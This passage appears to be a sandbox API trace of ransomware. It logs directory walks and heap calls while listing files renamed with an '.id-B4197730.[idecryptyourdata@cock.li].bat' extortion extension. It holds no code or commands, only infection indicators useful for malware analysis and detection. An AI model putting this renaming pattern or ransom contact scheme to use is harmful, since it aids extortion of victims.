ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.290] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd008b26, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 1 [0155.290] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd008b26, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 0 [0155.290] FindClose (in: hFindFile=0x6ba1f0 | out: hFindFile=0x6ba1f0) returned 1 [0155.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.290] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0155.290] FindClose (in: hFindFile=0x6ba1b0 | out: hFindFile=0x6ba1b0) returned 1 [0155.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0155.291] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0155.291] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0155.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0155.291] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName=".", cAlternateFileName="")) returned 0x6ba1b0 [0155.293] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="..", cAlternateFileName="")) returned 1 [0155.297] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1025", cAlternateFileName="")) returned 1 [0155.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.297] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x6ba1f0 [0155.299] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.299] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd21ec45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.299] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd26b034, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd26b034, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd2b75a2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x122e6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.299] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd02ed55, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.299] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd02ed55, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.299] FindClose (in: hFindFile=0x6ba1f0 | out: hFindFile=0x6ba1f0) returned 1 [0155.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.300] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1028", cAlternateFileName="")) returned 1 [0155.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.300] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727d88 [0155.530] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.530] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd291354, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd291354, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd291354, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.545] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd291354, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd291354, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd291354, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.545] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.545] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.545] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0155.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.546] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1029", cAlternateFileName="")) returned 1 [0155.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.546] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727808 [0155.547] FindNextFileW (in: hFindFile=0x727808, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.547] FindNextFileW (in: hFindFile=0x727808, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd34fddd, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd34fddd, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd34fddd, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.547] FindNextFileW (in: hFindFile=0x727808, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd2ddad2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd2ddad2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd303946, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13d46, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.547] FindNextFileW (in: hFindFile=0x727808, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.547] FindNextFileW (in: hFindFile=0x727808, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.547] FindClose (in: hFindFile=0x727808 | out: hFindFile=0x727808) returned 1 [0155.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.548] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1030", cAlternateFileName="")) returned 1 [0155.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.548] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727fc8 [0155.549] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.549] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd303946, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd303946, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd303946, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.550] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd329be4, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd329be4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd329be4, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x130b6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.550] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd054faf, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd054faf, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd434d45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.550] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd054faf, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd054faf, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd434d45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.550] FindClose (in: hFindFile=0x727fc8 | out: hFindFile=0x727fc8) returned 1 [0155.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.551] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1031", cAlternateFileName="")) returned 1 [0155.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.551] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728388 [0155.552] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.552] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd329be4, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd329be4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8870a3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.552] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd34fddd, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd34fddd, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd383175, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x142a6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.552] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, 